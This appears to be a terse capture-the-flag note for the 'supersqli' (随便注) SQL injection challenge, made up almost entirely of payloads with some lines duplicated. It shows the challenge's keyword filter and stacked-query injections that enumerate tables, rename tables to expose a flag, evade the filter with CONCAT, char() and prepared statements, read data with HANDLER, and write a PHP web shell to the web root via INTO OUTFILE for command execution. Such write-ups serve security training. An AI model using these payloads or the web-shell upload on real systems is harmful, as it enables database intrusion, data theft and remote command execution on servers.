随便注
return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);1';show tables; #1'; show columns from `words`;#1'; show columns from `1919810931114514` ;#
Last updated
return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);1';show tables; #1'; show columns from `words`;#1'; show columns from `1919810931114514` ;#
Last updated
1'; alter table words rename to words1; alter table `1919810931114514` rename to words; alter table words change flag id varchar(100);#1';
alter table words rename to words1;
alter table `1919810931114514` rename to words;
alter table words change flag id varchar(100);
#1';
SET @sql=concat(char(115,101,108,101,99,116)," * from `1919810931114514`");
PREPARE sqla from @sql;
EXECUTE sqla;
#-1';
SET @sql = CONCAT('se','lect * from `1919810931114514`;');
PREPARE sqla from @sql;
EXECUTE sqla;
#1';
Set @sql=concat("s","elect '<?php @print_r(`$_GET[oatmeal]`);?>' into outfile '/var/www/html/1",char(46),"php'");
PREPARE sqla from @sql;
EXECUTE sqla;
#/1.php?oatmeal=mysql -uroot -proot -e"use supersqli;select flag from \`1919810931114514\`;"1';
handler `1919810931114514` open as oatmeal;
handler oatmeal read first;
handler oatmeal close;#